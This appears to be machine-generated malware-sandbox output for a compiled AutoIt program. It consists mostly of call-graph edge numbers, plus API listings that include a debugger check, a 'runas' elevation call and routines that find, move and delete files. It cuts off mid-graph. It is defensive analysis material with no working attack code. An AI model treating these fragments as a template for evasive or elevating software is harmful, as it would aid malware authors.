99322->99321 99325 2701dd 99322->99325 99334 2a62a6 99322->99334 99326 2701b4 99323->99326 99327 261609 59 API calls 99325->99327 99330 261981 59 API calls 99326->99330 99332 2701e7 99327->99332 99328 27020f 99333 270221 99328->99333 99335 261c9c 59 API calls 99328->99335 99329 2a6376 99331 261821 59 API calls 99329->99331 99330->99322 99343 2a6333 99331->99343 99332->99321 99340 261462 59 API calls 99332->99340 99336 270231 99333->99336 99337 261c9c 59 API calls 99333->99337 99334->99329 99338 2a635f 99334->99338 99344 2a62dd 99334->99344 99335->99333 99339 270238 99336->99339 99341 261c9c 59 API calls 99336->99341 99337->99336 99338->99329 99348 2a634a 99338->99348 99342 261c9c 59 API calls 99339->99342 99347 27023f Mailbox 99339->99347 99340->99321 99341->99339 99342->99347 99343->99321 99345 261609 59 API calls 99343->99345 99425 26153b 59 API calls 2 library calls 99343->99425 99346 2a633b 99344->99346 99352 2a6326 99344->99352 99345->99343 99349 261821 59 API calls 99346->99349 99347->98749 99350 261821 59 API calls 99348->99350 99349->99343 99350->99343 99353 261821 59 API calls 99352->99353 99353->99343 99354->98790 99355->98790 99356->98790 99357->98790 99358->98790 99359->98790 99360->98790 99362 2642e8 99361->99362 99363 2642d9 99361->99363 99362->99363 99364 2642ed CloseHandle 99362->99364 99363->98776 99364->99363 99365->98720 99366->98726 99367->98754 99368->98783 99369->98783 99371 2b78ac 99370->99371 99373 2b78e3 99370->99373 99372 270fe6 Mailbox 59 API calls 99371->99372 99371->99373 99372->99373 99373->98779 99374->98782 99375->98805 99376->98796 99377->98789 99379 264312 CreateFileW 99378->99379 99380 2a06fc 99378->99380 99381 264334 99379->99381 99380->99381 99382 2a0702 CreateFileW 99380->99382 99381->99284 99382->99381 99383 2a0728 99382->99383 99384 26410a 2 API calls 99383->99384 99385 2a0733 99384->99385 99385->99381 99386->99286 99388 2638b5 99387->99388 99389 2638a8 99387->99389 99388->99288 99391 2b394d 99388->99391 99390 26410a 2 API calls 99389->99390 99390->99388 99394 2b384c 99391->99394 99393 2b3959 WriteFile 99393->99288 99395 2b385e 99394->99395 99396 2b3853 99394->99396 99395->99393 99401 2642ae SetFilePointerEx 99396->99401 99398 2b38b8 SetFilePointerEx 99402 2642ae SetFilePointerEx 99398->99402 99400 2b38d7 99400->99393 99401->99398 99402->99400 99404 264293 99403->99404 99408 26422e 99403->99408 99409 2642ae SetFilePointerEx 99404->99409 99405 262a84 99405->99295 99407 264266 ReadFile 99407->99405 99407->99408 99408->99405 99408->99407 99409->99408 99410->99302 99411->99301 99413 261471 99412->99413 99414 2614ce 99412->99414 99413->99414 99416 26147c 99413->99416 99415 261981 59 API calls 99414->99415 99422 26149f _memmove 99415->99422 99417 261497 99416->99417 99418 29f1de 99416->99418 99426 261b7c 59 API calls Mailbox 99417->99426 99419 261c7e 59 API calls 99418->99419 99421 29f1e8 99419->99421 99423 270fe6 Mailbox 59 API calls 99421->99423 99422->99328 99424 29f208 99423->99424 99425->99343 99426->99422 99431 2b9d05 __tzset_nolock _wcscmp 99427->99431 99428 2b96c4 GetSystemTimeAsFileTime 99428->99431 99429 2b9b99 99429->98813 99429->98814 99430 264ab2 74 API calls 99430->99431 99431->99428 99431->99429 99431->99430 99432 264a8c 85 API calls 99431->99432 99432->99431 99434 2b90da 99433->99434 99435 2b90cc 99433->99435 99437 2b911f 99434->99437 99438 27547b 115 API calls 99434->99438 99454 2b90e3 99434->99454 99436 27547b 115 API calls 99435->99436 99436->99434 99464 2b934c 74 API calls 3 library calls 99437->99464 99439 2b9104 99438->99439 99439->99437 99441 2b910d 99439->99441 99441->99454 99474 2755c6 99441->99474 99442 2b9163 99443 2b9188 99442->99443 99444 2b9167 99442->99444 99465 2b8f64 99443->99465 99447 2b9174 99444->99447 99449 2755c6 __fcloseall 83 API calls 99444->99449 99450 2755c6 __fcloseall 83 API calls 99447->99450 99447->99454 99449->99447 99450->99454 99451 2b91b6 99487 2b91e6 90 API calls 99451->99487 99452 2b9196 99455 2b91a3 99452->99455 99457 2755c6 __fcloseall 83 API calls 99452->99457 99454->98842 99455->99454 99459 2755c6 __fcloseall 83 API calls 99455->99459 99456 2b91bd 99488 2b92c8 58 API calls _free 99456->99488 99457->99455 99459->99454 99460 2b91c4 99461 2755c6 __fcloseall 83 API calls 99460->99461 99462 2b91d1 99460->99462 99461->99462 99462->99454 99463 2755c6 __fcloseall 83 API calls 99462->99463 99463->99454 99464->99442 99466 27593c std::exception::_Copy_str 58 API calls 99465->99466 99467 2b8f73 99466->99467 99468 27593c std::exception::_Copy_str 58 API calls 99467->99468 99469 2b8f87 99468->99469 99470 27593c std::exception::_Copy_str 58 API calls 99469->99470 99471 2b8f9b 99470->99471 99473 2b8fae 99471->99473 99489 2b92c8 58 API calls _free 99471->99489 99473->99451 99473->99452 99475 2755d2 __ioinit 99474->99475 99476 2755e6 99475->99476 99477 2755fe 99475->99477 99506 278d58 58 API calls __getptd_noexit 99476->99506 99480 276e3e __lock_file 59 API calls 99477->99480 99483 2755f6 __ioinit 99477->99483 99479 2755eb 99507 278fe6 9 API calls __cftof2_l 99479->99507 99482 275610 99480->99482 99490 27555a 99482->99490 99483->99454 99487->99456 99488->99460 99489->99473 99491 27557d 99490->99491 99492 275569 99490->99492 99494 275579 99491->99494 99495 274c5d __flush 78 API calls 99491->99495 99539 278d58 58 API calls __getptd_noexit 99492->99539 99508 275635 LeaveCriticalSection LeaveCriticalSection __wfsopen 99494->99508 99497 275589 99495->99497 99496 27556e 99540 278fe6 9 API calls __cftof2_l 99496->99540 99509 280da7 99497->99509 99501 274906 __flush 58 API calls 99502 275597 99501->99502 99513 280c32 99502->99513 99506->99479 99507->99483 99508->99483 99510 275591 99509->99510 99511 280db4 99509->99511 99510->99501 99511->99510 99512 272f85 _free 58 API calls 99511->99512 99512->99510 99514 280c3e __ioinit 99513->99514 99515 280c4b 99514->99515 99516 280c62 99514->99516 99565 278d24 58 API calls __getptd_noexit 99515->99565 99517 280ced 99516->99517 99519 280c72 99516->99519 99570 278d24 58 API calls __getptd_noexit 99517->99570 99522 280c9a 99519->99522 99523 280c90 99519->99523 99521 280c50 99566 278d58 58 API calls __getptd_noexit 99521->99566 99541 27d436 99522->99541 99567 278d24 58 API calls __getptd_noexit 99523->99567 99524 280c95 99571 278d58 58 API calls __getptd_noexit 99524->99571 99535 280c57 __ioinit 99539->99496 99540->99494 99543 27d442 __ioinit 99541->99543 99565->99521 99566->99535 99567->99524 99570->99524 99574 262cc7 99573->99574 99580 262ddb 99573->99580 99575 270fe6 Mailbox 59 API calls 99574->99575 99574->99580 99577 262cee 99575->99577 99576 270fe6 Mailbox 59 API calls 99578 262d63 99576->99578 99577->99576 99578->99580 99582 263297 59 API calls 99578->99582 99583 26343f 59 API calls 99578->99583 99586 2620e0 94 API calls 2 library calls 99578->99586 99587 2a715b 59 API calls Mailbox 99578->99587 99580->98345 99582->99578 99583->99578 99584->98348 99585->98350 99586->99578 99587->99578 99588->98363 99589->98364 99591 265810 99590->99591 99592 26581c 99590->99592 99591->98370 99624 2b34dd 62 API calls _W_store_winword 99591->99624 99592->99591 99593 265821 DestroyIcon 99592->99593 99593->99591 99595 265715 99594->99595 99596 2657fa Mailbox 99594->99596 99625 26162d 99595->99625 99624->98370 99633 2552c6 99632->99633 99635 255313 99632->99635 99634 2552d3 PeekMessageW 99633->99634 99633->99635 99634->99635 99636 2552ec 99634->99636 99635->99636 99638 28df68 TranslateAcceleratorW 99635->99638 99639 255352 TranslateMessage DispatchMessageW 99635->99639 99640 25533e PeekMessageW 99635->99640 99869 25359e 99635->99869 99636->98451 99638->99635 99638->99640 99639->99640 99640->99635 99640->99636 99642 259a31 99641->99642 99643 259a1d 99641->99643 99908 2ba48d 89 API calls 4 library calls 99642->99908 99874 2594e0 99643->99874 99647 292478 99647->99647 99649 259cb5 99648->99649 99650 29247d 99649->99650 99652 259d1f 99649->99652 99662 259d79 99649->99662 99651 2553b0 298 API calls 99650->99651 99653 292492 99651->99653 99656 261207 59 API calls 99652->99656 99652->99662 99677 259f50 Mailbox 99653->99677 99654 261207 59 API calls 99654->99662 99657 2924d8 99656->99657 99658 272f70 __cinit 67 API calls 99658->99662 99660 2924fa 99660->98451 99661 2539be 68 API calls 99661->99677 99662->99654 99662->99658 99662->99660 99665 259f3a 99662->99665 99662->99677 99663 2553b0 298 API calls 99663->99677 99665->99677 99954 2ba48d 89 API calls 4 library calls 99665->99954 99666 254230 59 API calls 99666->99677 99670 25a775 99673 2ba48d 89 API calls 99673->99677 99677->99661 99677->99663 99677->99666 99677->99670 99677->99673 99678 25a058 99677->99678 99952 261bcc 59 API calls 2 library calls 99677->99952 99955 2a7aad 59 API calls 99677->99955 99956 2cccac 298 API calls 99677->99956 99957 2cbc26 298 API calls Mailbox 99677->99957 99959 255190 59 API calls Mailbox 99677->99959 99960 2c9ab0 298 API calls Mailbox 99677->99960 99678->98451 99680 292d51 99679->99680 99681 25a84c 99679->99681 99962 2ba48d 89 API calls 4 library calls 99680->99962 99684 292d6a 99681->99684 99691 25a888 _memmove 99681->99691 99683 292d62 99683->98451 99963 2ba48d 89 API calls 4 library calls 99684->99963 99687 270fe6 59 API calls Mailbox 99687->99691 99688 292dae 99964 25a9de 298 API calls 99688->99964 99689 2553b0 298 API calls 99689->99691 99691->99687 99691->99688 99691->99689 99692 292dc8 99691->99692 99693 25a975 99691->99693 99694 25a962 99691->99694 99692->99693 99965 2ba48d 89 API calls 4 library calls 99692->99965 99693->98451 99694->99693 99961 2ca9c3 85 API calls Mailbox 99694->99961 99697 2bbdbb Mailbox 99696->99697 99698 2bbcf5 99696->99698 99700 254d37 84 API calls 99697->99700 99709 2bbdc3 Mailbox 99697->99709 99966 25502b 99698->99966 99702 2bbdf3 99700->99702 99701 2bbd00 99703 254d37 84 API calls 99702->99703 99709->98451 100098 2bf87d 99726->100098 100183 2cd1c6 99729->100183 100272 2b494a GetFileAttributesW 99732->100272 99736 254d37 84 API calls 99735->99736 99737 2bc286 99736->99737 100276 2b4005 99737->100276 100300 263740 99742->100300 99745 2930b6 99747 25b07f 99747->99745 99748 2930d4 99747->99748 99777 25bb86 99747->99777 99779 25b132 Mailbox _memmove 99747->99779 99779->99777 99784->98384 99786->98451 99787->98390 99788->98390 99789->98390 99790->98451 99791->98451 99792->98451 99794 254d51 99793->99794 99795 254d4b 99793->99795 99796 28db28 __i64tow 99794->99796 99797 254d99 99794->99797 99798 254d57 __itow 99794->99798 99802 28da2f 99794->99802 99795->98451 100328 2738c8 83 API calls 3 library calls 99797->100328 99801 270fe6 Mailbox 59 API calls 99798->99801 99803 254d71 99801->99803 99804 270fe6 Mailbox 59 API calls 99802->99804 99806 28daa7 Mailbox _wcscpy 99802->99806 99803->99795 99807 28da74 99804->99807 100329 2738c8 83 API calls 3 library calls 99806->100329 99811->98451 99812->98451 99813->98451 99814->98434 99815->98434 99816->98434 99818 2cc39a 99817->99818 99819 2cc380 99817->99819 100330 2ca8fd 99818->100330 100353 2ba48d 89 API calls 4 library calls 99819->100353 99823 2553b0 297 API calls 99850 2cc392 Mailbox 99850->98451 99857->98434 99858->98434 100370 2b4ce2 99859->100370 99870 2535e2 99869->99870 99873 2535b0 99869->99873 99870->99635 99871 2535d5 IsDialogMessageW 99871->99870 99871->99873 99872 28d273 GetClassLongW 99872->99871 99872->99873 99873->99870 99873->99871 99873->99872 99909 2553b0 99874->99909 99908->99647 99910 2553cf 99909->99910 99932 2553fd Mailbox 99909->99932 99952->99677 99954->99677 99955->99677 99956->99677 99957->99677 99959->99677 99960->99677 99961->99693 99962->99683 99963->99693 99964->99692 99965->99693 99967 255041 99966->99967 99968 25503c 99966->99968 99967->99701 99968->99967 100028 2737ba 59 API calls 99968->100028 100028->99967 100099 2bf898 100098->100099 100100 2bf8f2 100098->100100 100102 270fe6 Mailbox 59 API calls 100099->100102 100160 2bfbb7 59 API calls 100100->100160 100103 2bf89f 100102->100103 100104 2bf8ab 100103->100104 100158 263df7 60 API calls Mailbox 100103->100158 100108 2bf8ff 100158->100104 100160->100108 100184 254d37 84 API calls 100183->100184 100185 2cd203 100184->100185 100204 2cd24a Mailbox 100185->100204 100221 2cde8e 100185->100221 100273 2b4131 100272->100273 100274 2b4965 FindFirstFileW 100272->100274 100273->98451 100274->100273 100275 2b497a FindClose 100274->100275 100275->100273 100277 261207 59 API calls 100276->100277 100301 26374f 100300->100301 100304 26376a 100300->100304 100302 261aa4 59 API calls 100301->100302 100303 263757 CharUpperBuffW 100302->100303 100303->100304 100304->99747 100328->99798 100329->99796 100331 2ca918 100330->100331 100332 2ca970 100330->100332 100333 270fe6 Mailbox 59 API calls 100331->100333 100332->99823 100353->99850 100371 2b4d09 100370->100371 100375 2b4cf0 100370->100375 100377 2737c3 59 API calls __wcstoi64 100371->100377 100373 2b4d0f 100375->100371 100375->100373 100376 27385c GetStringTypeW _iswctype 100375->100376 100376->100375 100377->100373 100390 256981 100397 25373a 100390->100397 100392 256997 100406 257b3f 100392->100406 100394 2569bf 100395 25584d 100394->100395 100418 2ba48d 89 API calls 4 library calls 100394->100418 100398 253746 100397->100398 100399 253758 100397->100399 100419 25523c 59 API calls 100398->100419 100401 253787 100399->100401 100402 25375e 100399->100402 100420 25523c 59 API calls 100401->100420 100403 270fe6 Mailbox 59 API calls 100402->100403 100405 253750 100403->100405 100405->100392 100407 26162d 59 API calls 100406->100407 100408 257b64 _wcscmp 100407->100408 100409 261a36 59 API calls 100408->100409 100411 257b98 Mailbox 100408->100411 100410 28ffad 100409->100410 100412 2617e0 59 API calls 100410->100412 100411->100394 100413 28ffb8 100412->100413 100421 253938 68 API calls 100413->100421 100415 28ffc9 100417 28ffcd Mailbox 100415->100417 100422 25523c 59 API calls 100415->100422 100417->100394 100418->100395 100419->100405 100420->100405 100421->100415 100422->100417 100423 264d83 100424 264dba 100423->100424 100425 264e37 100424->100425 100426 264dd8 100424->100426 100464 264e35 100424->100464 100428 2a09c2 100425->100428 100429 264e3d 100425->100429 100430 264de5 100426->100430 100431 264ead PostQuitMessage 100426->100431 100427 264e1a DefWindowProcW 100454 264e28 100427->100454 100478 25c460 10 API calls Mailbox 100428->100478 100432 264e65 SetTimer RegisterWindowMessageW 100429->100432 100433 264e42 100429->100433 100434 264df0 100430->100434 100435 2a0a35 100430->100435 100431->100454 100439 264e8e CreatePopupMenu I_RpcFreeBuffer 100432->100439 100432->100454 100437 2a0965 100433->100437 100438 264e49 KillTimer 100433->100438 100440 264eb7 100434->100440 100441 264df8 100434->100441 100481 2b2cce 97 API calls _memset 100435->100481 100446 2a096a 100437->100446 100447 2a099e MoveWindow 100437->100447 100448 265ac3 Shell_NotifyIconW 100438->100448 100449 264e9b 100439->100449 100468 265b29 100440->100468 100450 2a0a1a 100441->100450 100451 264e03 100441->100451 100443 2a09e9 100479 25c483 298 API calls Mailbox 100443->100479 100455 2a096e 100446->100455 100456 2a098d SetFocus 100446->100456 100447->100454 100457 264e5c 100448->100457 100476 265bd7 107 API calls _memset 100449->100476 100450->100427 100480 2a8854 59 API calls Mailbox 100450->100480 100451->100449 100453 264e0e 100451->100453 100452 2a0a47 100452->100427 100452->100454 100453->100427 100465 265ac3 Shell_NotifyIconW 100453->100465 100455->100453 100460 2a0977 100455->100460 100456->100454 100475 2534e4 DeleteObject DestroyWindow Mailbox 100457->100475 100459 264eab 100459->100454 100477 25c460 10 API calls Mailbox 100460->100477 100464->100427 100466 2a0a0e 100465->100466 100467 2659d3 94 API calls 100466->100467 100467->100464 100469 265bc2 100468->100469 100470 265b40 _memset 100468->100470 100469->100454 100471 2656f8 87 API calls 100470->100471 100473 265b67 100471->100473 100472 265bab KillTimer SetTimer 100472->100469 100473->100472 100474 2a0d6e Shell_NotifyIconW 100473->100474 100474->100472 100475->100454 100476->100459 100477->100454 100478->100443 100479->100453 100480->100464 100481->100452 100893 25107d 100898 262fc5 100893->100898 100895 25108c 100896 272f70 __cinit 67 API calls 100895->100896 100897 251096 100896->100897 100899 262fd5 __ftell_nolock 100898->100899 100900 261207 59 API calls 100899->100900 100901 26308b 100900->100901 100902 2700cf 61 API calls 100901->100902 100903 263094 100902->100903 100929 2708c1 100903->100929 100906 261900 59 API calls 100907 2630ad 100906->100907 100908 264c94 59 API calls 100907->100908 100909 2630bc 100908->100909 100910 261207 59 API calls 100909->100910 100911 2630c5 100910->100911 100912 2619e1 59 API calls 100911->100912 100913 2630ce RegOpenKeyExW 100912->100913 100914 2a01a3 RegQueryValueExW 100913->100914 100919 2630f0 Mailbox 100913->100919 100915 2a01c0 100914->100915 100916 2a0235 RegCloseKey 100914->100916 100917 270fe6 Mailbox 59 API calls 100915->100917 100916->100919 100928 2a0247 _wcscat Mailbox __wsetenvp 100916->100928 100918 2a01d9 100917->100918 100920 26433f 59 API calls 100918->100920 100919->100895 100921 2a01e4 RegQueryValueExW 100920->100921 100923 2a0201 100921->100923 100925 2a021b 100921->100925 100922 261609 59 API calls 100922->100928 100924 261821 59 API calls 100923->100924 100924->100925 100925->100916 100926 261a36 59 API calls 100926->100928 100927 264c94 59 API calls 100927->100928 100928->100919 100928->100922 100928->100926 100928->100927 100930 281b70 __ftell_nolock 100929->100930 100931 2708ce GetFullPathNameW 100930->100931 100932 2708f0 100931->100932 100933 261821 59 API calls 100932->100933 100934 26309f 100933->100934 100934->100906 100482 259a6c 100485 25829c 100482->100485 100484 259a78 100486 2582b4 100485->100486 100489 258308 100485->100489 100487 2553b0 298 API calls 100486->100487 100486->100489 100492 2582eb 100487->100492 100491 258331 100489->100491 100495 2ba48d 89 API calls 4 library calls 100489->100495 100490 290ed8 100490->100490 100491->100484 100492->100491 100494 25523c 59 API calls 100492->100494 100494->100489 100495->100490 100496 28e463 100497 25373a 59 API calls 100496->100497 100498 28e479 100497->100498 100499 28e4fa 100498->100499 100500 28e48f 100498->100500 100502 25b020 298 API calls 100499->100502 100508 255376 60 API calls 100500->100508 100507 28e4ee Mailbox 100502->100507 100504 28e4ce 100504->100507 100509 2b890a 59 API calls Mailbox 100504->100509 100505 28f046 Mailbox 100507->100505 100510 2ba48d 89 API calls 4 library calls 100507->100510 100508->100504 100509->100507 100510->100505 100511 259a88 100514 2586e0 100511->100514 100515 2586fd 100514->100515 100516 290ff8 100515->100516 100517 290fad 100515->100517 100539 258724 100515->100539 100554 2caad0 298 API calls __cinit 100516->100554 100520 290fb5 100517->100520 100524 290fc2 100517->100524 100517->100539 100552 2cb0e4 298 API calls 100520->100552 100522 272f70 __cinit 67 API calls 100522->100539 100535 25898d 100524->100535 100553 2cb58c 298 API calls 3 library calls 100524->100553 100525 291289 100525->100525 100527 253f42 68 API calls 100527->100539 100528 2911af 100557 2cae3b 89 API calls 100528->100557 100531 258a17 100532 2539be 68 API calls 100532->100539 100535->100531 100558 2ba48d 89 API calls 4 library calls 100535->100558 100538 253c30 68 API calls 100538->100539 100539->100522 100539->100527 100539->100528 100539->100531 100539->100532 100539->100535 100539->100538 100540 2553b0 298 API calls 100539->100540 100541 261c9c 59 API calls 100539->100541 100543 253938 68 API calls 100539->100543 100544 25855e 298 API calls 100539->100544 100545 255278 100539->100545 100550 2584e2 89 API calls 100539->100550 100551 25835f 298 API calls 100539->100551 100555 25523c 59 API calls 100539->100555 100556 2a73ab 59 API calls 100539->100556 100540->100539 100541->100539 100543->100539 100544->100539 100546 270fe6 Mailbox 59 API calls 100545->100546 100547 255285 100546->100547 100548 255294 100547->100548 100549 261a36 59 API calls 100547->100549 100548->100539 100549->100548 100550->100539 100551->100539 100552->100524 100553->100535 100554->100539 100555->100539 100556->100539 100557->100535 100558->100525

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026526C
                                                          • IsDebuggerPresent.KERNEL32 ref: 0026527E
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002652E6
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 0025BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0025BC07
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00265366
                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002A0B2E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002A0B66
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00306D10), ref: 002A0BE9
                                                          • ShellExecuteW.SHELL32(00000000), ref: 002A0BF0
                                                            • Part of subcall function 0026514C: GetSysColorBrush.USER32(0000000F), ref: 00265156
                                                            • Part of subcall function 0026514C: LoadCursorW.USER32(00000000,00007F00), ref: 00265165
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(00000063), ref: 0026517C
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(000000A4), ref: 0026518E
                                                            • Part of subcall function 0026514C: LoadIconW.USER32(000000A2), ref: 002651A0
                                                            • Part of subcall function 0026514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002651C6
                                                            • Part of subcall function 0026514C: RegisterClassExW.USER32(?), ref: 0026521C
                                                            • Part of subcall function 002650DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00265109
                                                            • Part of subcall function 002650DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0026512A
                                                            • Part of subcall function 002650DB: ShowWindow.USER32(00000000), ref: 0026513E
                                                            • Part of subcall function 002650DB: ShowWindow.USER32(00000000), ref: 00265147
                                                            • Part of subcall function 002659D3: _memset.LIBCMT ref: 002659F9
                                                            • Part of subcall function 002659D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00265A9E
                                                          Strings
                                                          • AutoIt, xrefs: 002A0B23
                                                          • runas, xrefs: 002A0BE4
                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002A0B28
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                          • API String ID: 529118366-2030392706
                                                          • Opcode ID: 8c8fb65caf0fcb8a9f3908097318c81c2720a4075eedf52b985fbf7b7af99e44
                                                          • Instruction ID: 5f2be292a4169dbbf13d6988f43c79db21df8152adb85eb141f9831016448d5a
                                                          • Opcode Fuzzy Hash: 8c8fb65caf0fcb8a9f3908097318c81c2720a4075eedf52b985fbf7b7af99e44
                                                          • Instruction Fuzzy Hash: 8B512830964299ABCB03EBB0EC95DED7B78AB0D740F184495F451661A2CEB415F7CF21

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1036 2b3ce2-2b3d48 call 261207 * 4 call 270284 * 2 call 2b4f82 call 2b4fec 1053 2b3d4a-2b3d4e call 261900 1036->1053 1054 2b3d53-2b3d5d call 2b4fec 1036->1054 1053->1054 1058 2b3d68-2b3da6 call 261207 * 2 call 270119 FindFirstFileW 1054->1058 1059 2b3d5f-2b3d63 call 261900 1054->1059 1067 2b3dac 1058->1067 1068 2b3eb4-2b3ebb FindClose 1058->1068 1059->1058 1070 2b3db2-2b3db4 1067->1070 1069 2b3ebe-2b3ef6 call 261cb6 * 6 1068->1069 1070->1068 1072 2b3dba-2b3dc1 1070->1072 1074 2b3e88-2b3e9b FindNextFileW 1072->1074 1075 2b3dc7-2b3e1f call 261a36 call 2b4561 call 261cb6 call 261c9c call 2617e0 call 261900 call 2b412a 1072->1075 1074->1070 1078 2b3ea1-2b3ea6 1074->1078 1101 2b3e21-2b3e24 1075->1101 1102 2b3e40-2b3e44 1075->1102 1078->1070 1105 2b3eab-2b3eb2 FindClose 1101->1105 1106 2b3e2a-2b3e3c call 26151f 1101->1106 1103 2b3e72-2b3e78 call 2b3ef7 1102->1103 1104 2b3e46-2b3e49 1102->1104 1113 2b3e7d 1103->1113 1107 2b3e4b 1104->1107 1108 2b3e59-2b3e69 call 2b3ef7 1104->1108 1105->1069 1111 2b3e4e-2b3e57 MoveFileW 1106->1111 1117 2b3e3e DeleteFileW 1106->1117 1107->1111 1108->1105 1118 2b3e6b-2b3e70 DeleteFileW 1108->1118 1115 2b3e80-2b3e82 1111->1115 1113->1115 1115->1105 1119 2b3e84 1115->1119 1117->1102 1118->1115 1119->1074
                                                          APIs
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B3D96
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B3E3E
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B3E51
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B3E6E
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B3E90
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B3EAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 26d5ac621c0e2c7562b64b5995f0ce21c7d59a31f2773f9b0fae8d5ad9a348d4
                                                          • Instruction ID: f3ee0ff656b635771bbd0657fc8c41e8ed221a52a12c9a3ecc3153f8de2d4cd5
                                                          • Opcode Fuzzy Hash: 26d5ac621c0e2c7562b64b5995f0ce21c7d59a31f2773f9b0fae8d5ad9a348d4
                                                          • Instruction Fuzzy Hash: 9451A23182115E9ACF15EBE0C9929EDB779AF10341F244166E846B7092EF307F69CF61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1170 265d13-265d73 call 261207 GetVersionExW call 261821 1175 265e78-265e7a 1170->1175 1176 265d79 1170->1176 1177 2a0fa9-2a0fb5 1175->1177 1178 265d7c-265d81 1176->1178 1179 2a0fb6-2a0fba 1177->1179 1180 265d87 1178->1180 1181 265e7f-265e80 1178->1181 1183 2a0fbc 1179->1183 1184 2a0fbd-2a0fc9 1179->1184 1182 265d88-265dbf call 261981 call 26133d 1180->1182 1181->1182 1193 2a1098-2a109b 1182->1193 1194 265dc5-265dc6 1182->1194 1183->1184 1184->1179 1185 2a0fcb-2a0fd0 1184->1185 1185->1178 1187 2a0fd6-2a0fdd 1185->1187 1187->1177 1189 2a0fdf 1187->1189 1192 2a0fe4-2a0fea 1189->1192 1195 265e00-265e17 GetCurrentProcess IsWow64Process 1192->1195 1196 2a109d 1193->1196 1197 2a10b4-2a10b8 1193->1197 1198 2a0fef-2a0ffa 1194->1198 1199 265dcc-265dcf 1194->1199 1204 265e1c-265e2d 1195->1204 1205 265e19 1195->1205 1202 2a10a0 1196->1202 1206 2a10ba-2a10c3 1197->1206 1207 2a10a3-2a10ac 1197->1207 1200 2a0ffc-2a1002 1198->1200 1201 2a1017-2a1019 1198->1201 1199->1195 1203 265dd1-265def 1199->1203 1208 2a100c-2a1012 1200->1208 1209 2a1004-2a1007 1200->1209 1211 2a101b-2a1027 1201->1211 1212 2a103c-2a103f 1201->1212 1202->1207 1203->1195 1210 265df1-265df7 1203->1210 1214 265e2f-265e3f call 2655f0 1204->1214 1215 265e98-265ea2 GetSystemInfo 1204->1215 1205->1204 1206->1202 1213 2a10c5-2a10c8 1206->1213 1207->1197 1208->1195 1209->1195 1210->1192 1216 265dfd 1210->1216 1217 2a1029-2a102c 1211->1217 1218 2a1031-2a1037 1211->1218 1220 2a1041-2a1050 1212->1220 1221 2a1065-2a1068 1212->1221 1213->1207 1227 265e41-265e4e call 2655f0 1214->1227 1228 265e8c-265e96 GetSystemInfo 1214->1228 1219 265e65-265e75 